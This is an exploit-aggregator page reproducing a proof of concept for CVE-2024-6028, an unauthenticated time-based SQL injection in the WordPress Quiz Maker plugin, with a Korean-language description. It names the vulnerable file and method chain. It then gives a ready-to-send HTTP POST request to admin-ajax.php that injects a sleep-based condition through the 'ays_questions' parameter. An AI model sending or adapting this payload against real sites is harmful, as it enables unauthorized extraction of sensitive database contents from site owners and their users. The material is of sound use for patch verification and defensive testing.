Sploitus

Exploit for CVE-2024-6028-Poc

kitploit ยท 2026-08-25

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GMH5225-CVE-2024-6028-POC
# CVE-2024-6028-Poc

CVE-2024-6028 Quiz Maker <= 6.5.8.3 - 'ays_questions' ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ํ†ตํ•œ ์ธ์ฆ๋˜์ง€ ์•Š์€ SQL ์ธ์ ์…˜

## ์„ค๋ช…

WordPress์šฉ Quiz Maker ํ”Œ๋Ÿฌ๊ทธ์ธ์€ ๋ฒ„์ „ 6.5.8.3๊นŒ์ง€ (ํฌํ•จ)์˜ ๋ชจ๋“  ๋ฒ„์ „์—์„œ 'ays_questions' ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ํ†ตํ•ด ์‹œ๊ฐ„ ๊ธฐ๋ฐ˜ SQL ์ธ์ ์…˜์— ์ทจ์•ฝํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์‚ฌ์šฉ์ž ์ œ๊ณต ๋งค๊ฐœ๋ณ€์ˆ˜์— ๋Œ€ํ•œ ์ด์Šค์ผ€์ดํ”„ ์ฒ˜๋ฆฌ ๋ถ€์กฑ๊ณผ ๊ธฐ์กด SQL ์ฟผ๋ฆฌ ์ค€๋น„ ๋ถ€์กฑ์œผ๋กœ ์ธํ•ด ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. ์ด๋กœ ์ธํ•ด ์ธ์ฆ๋˜์ง€ ์•Š์€ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ธฐ์กด ์ฟผ๋ฆฌ์— ์ถ”๊ฐ€ SQL ์ฟผ๋ฆฌ๋ฅผ ์‚ฝ์ž…ํ•˜์—ฌ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์—์„œ ๋ฏผ๊ฐํ•œ ์ •๋ณด๋ฅผ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-maker/quiz-maker-6583-unauthenticated-sql-injection-via-ays-questions-parameter

ํŒŒ์ผ: wp-content/plugins/quiz-maker/public/class-quiz-maker-public.php

ํด๋ž˜์Šค: Quiz_Maker_Public

์ž‘๋™ ๊ณผ์ •: ays_finish_quiz ๋ฉ”์„œ๋“œ -> get_questions_categories ๋ฉ”์„œ๋“œ image image image

## PoC

root@kitploit:~
    
    
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: <Host>
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 114
    
    ays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz